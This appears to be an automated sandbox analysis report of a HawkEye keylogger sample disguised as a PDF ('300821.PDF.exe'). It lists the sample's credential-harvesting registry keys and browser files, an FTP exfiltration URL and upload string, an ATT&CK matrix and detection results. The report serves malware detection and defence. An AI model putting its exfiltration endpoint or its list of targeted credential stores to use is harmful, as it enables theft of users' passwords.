                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Users\user\Desktop\300821.PDF.exe VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00407674 GetVersionExW,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 9_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
                      Source: C:\Users\user\Desktop\300821.PDF.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\300821.PDF.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information:

                      Yara detected MailPassView
                      Source: Yara match | File source: 5.2.300821.PDF.exe.45fa72.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.3b69930.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.3b69930.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000009.00000002.684649797.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 300821.PDF.exe PID: 4816, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: 300821.PDF.exe PID: 2848, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: vbc.exe PID: 5604, type: MEMORYSTR
                      Yara detected HawkEye Keylogger
                      Source: Yara match | File source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.2b8b210.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 300821.PDF.exe PID: 4816, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: 300821.PDF.exe PID: 2848, type: MEMORYSTR
                      Tries to steal Mail credentials (via file registry)
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: ESMTPPassword
                      Yara detected WebBrowserPassView password recovery tool
                      Source: Yara match | File source: 5.2.300821.PDF.exe.409c0d.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.40c29bd.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.3b81b50.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.3b81b50.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.3b69930.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000008.00000002.693074434.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 300821.PDF.exe PID: 4816, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: 300821.PDF.exe PID: 2848, type: MEMORYSTR
                      Tries to steal Mail credentials (via file access)
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Tries to steal Instant Messenger accounts or passwords
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                      Remote Access Functionality:

                      Yara detected HawkEye Keylogger
                      Source: Yara match | File source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.300821.PDF.exe.2b8b210.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 300821.PDF.exe PID: 4816, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: 300821.PDF.exe PID: 2848, type: MEMORYSTR
                      Detected HawkEye Rat
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp | String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp | String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp | String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp | String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                      Source: 300821.PDF.exe, 00000005.00000002.915713906.0000000002DA8000.00000004.00000001.sdmp | String found in binary or memory: lAHawkEye_Keylogger_Stealer_Records_238576 8.30.2021 7:03:04 AM.txt
                      Source: 300821.PDF.exe, 00000005.00000002.915713906.0000000002DA8000.00000004.00000001.sdmp | String found in binary or memory: lXftp://ftp.vn-gpack.org/HawkEye_Keylogger_Stealer_Records_238576 8.30.2021 7:03:04 AM.txt
                      Source: 300821.PDF.exe, 00000005.00000002.915713906.0000000002DA8000.00000004.00000001.sdmp | String found in binary or memory: ftp://ftp.vn-gpack.org/HawkEye_Keylogger_Stealer_Records_238576%208.30.2021%207:03:04%20AM.txt
                      Source: 300821.PDF.exe, 00000005.00000002.915713906.0000000002DA8000.00000004.00000001.sdmp | String found in binary or memory: l^ftp://ftp.vn-gpack.org/HawkEye_Keylogger_Stealer_Records_238576%208.30.2021%207:03:04%20AM.txt
                      Source: 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp | String found in binary or memory: HawkEyeKeylogger
                      Source: 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp | String found in binary or memory: l&HawkEye_Keylogger_Execution_Confirmed_
                      Source: 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp | String found in binary or memory: l"HawkEye_Keylogger_Stealer_Records_
                      Source: 300821.PDF.exe, 00000005.00000002.915724123.0000000002DB5000.00000004.00000001.sdmp | String found in binary or memory: lAHawkEye_Keylogger_Stealer_Records_238576 8.30.2021 7:03:04 AM.txtP
                      Source: 300821.PDF.exe, 00000005.00000002.915724123.0000000002DB5000.00000004.00000001.sdmp | String found in binary or memory: lHSTOR HawkEye_Keylogger_Stealer_Records_238576 8.30.2021 7:03:04 AM.txt
                      Source: 300821.PDF.exe, 00000005.00000002.915724123.0000000002DB5000.00000004.00000001.sdmp | String found in binary or memory: STOR HawkEye_Keylogger_Stealer_Records_238576 8.30.2021 7:03:04 AM.txt
                      Source: 300821.PDF.exe, 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                      Source: 300821.PDF.exe, 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                      Source: 300821.PDF.exe, 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                      Source: 300821.PDF.exe, 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_

                      Mitre Att&ck Matrix

                      (Columns are ATT&CK tactics; each cell is a technique, and a number after a technique is the signature-count badge from the original report. Techniques without a number were not matched for this sample.)

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Replication Through Removable Media 1 | Windows Management Instrumentation 1 | Application Shimming 1 | Application Shimming 1 | Disable or Modify Tools 1 | OS Credential Dumping 1 | System Time Discovery 1 | Replication Through Removable Media 1 | Archive Collected Data 1 1 | Exfiltration Over Alternative Protocol 1 | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Native API 1 1 | Boot or Logon Initialization Scripts | Process Injection 1 1 1 | Deobfuscate/Decode Files or Information 1 1 | Input Capture 1 | Peripheral Device Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Shared Modules 1 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 1 4 1 | Credentials in Registry 2 | Account Discovery 1 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Remote Access Software 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 1 3 | Credentials In Files 1 | File and Directory Discovery 1 | Distributed Component Object Model | Input Capture 1 | Scheduled Transfer | Non-Application Layer Protocol 1 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 1 1 | LSA Secrets | System Information Discovery 1 8 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Application Layer Protocol 1 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 4 1 | Cached Domain Credentials | Query Registry 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 1 1 1 | DCSync | Security Software Discovery 1 2 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories 1 | Proc Filesystem | Virtualization/Sandbox Evasion 4 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Process Discovery 3 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Application Window Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
                      Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | System Owner/User Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
                      Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | Remote System Discovery 1 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery

                      Behavior Graph

                      (Interactive process/behaviour graph; the graph and its legend are not reproduced in this text extraction.)

                      Screenshots

                      (Screenshot thumbnails are not reproduced in this text extraction.)

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      300821.PDF.exe | 22% | ReversingLabs | ByteCode-MSIL.Infostealer.Heye

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      8.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125438
                      0.2.300821.PDF.exe.4d2ad28.6.unpack | 100% | Avira | TR/Inject.vcoldi
                      5.2.300821.PDF.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                      5.2.300821.PDF.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473

                      Domains

                      Source | Detection | Scanner | Label
                      ftp.vn-gpack.org | 1% | Virustotal |

                      URLs

                      Source | Detection | Scanner | Label
                      https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
                      https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js | 0% | URL Reputation | safe
                      http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z | 0% | Avira URL Cloud | safe
                      http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
                      http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
                      https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css | 0% | URL Reputation | safe
                      https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937 | 0% | URL Reputation | safe
                      https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5 | 0% | URL Reputation | safe
                      https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e | 0% | Avira URL Cloud | safe
                      https://pki.goog/repository/0 | 0% | URL Reputation | safe
                      https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1 | 0% | URL Reputation | safe
                      http://www.carterandcone.coml | 0% | URL Reputation | safe
                      https://172.217.23.78/ | 0% | Avira URL Cloud | safe
